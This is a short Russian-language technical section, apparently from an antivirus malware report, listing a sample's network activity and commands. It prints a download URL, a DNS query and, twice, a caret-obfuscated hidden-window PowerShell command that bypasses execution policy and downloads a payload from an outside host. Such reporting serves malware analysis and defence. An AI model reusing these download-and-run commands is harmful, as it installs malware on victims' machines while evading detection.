Техническая информация
- http://lolotocoporo.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoweRS^h^El^L.eX^e^ -exeCu^TIo^np^o^L^IcY b^y^PAs^s^ -NoP^ro^filE -wiNDowS^TyLE^ HIDd^EN (^N^eW-oB^JEcT^ S^YS^t^eM.^n^eT.^we^bcLiE^N^T)^.dOWnL^OaDf^ILE^('http://lolotocoporo....
- DNS ASK lo####coporo.wang
- '<SYSTEM32>\cmd.exe' /c "PoweRS^h^El^L.eX^e^ -exeCu^TIo^np^o^L^IcY b^y^PAs^s^ -NoP^ro^filE -wiNDowS^TyLE^ HIDd^EN (^N^eW-oB^JEcT^ S^YS^t^eM.^n^eT.^we^bcLiE^N^T)^.dOWnL^OaDf^ILE^('http://lolotocoporo....' (со скрытым окном)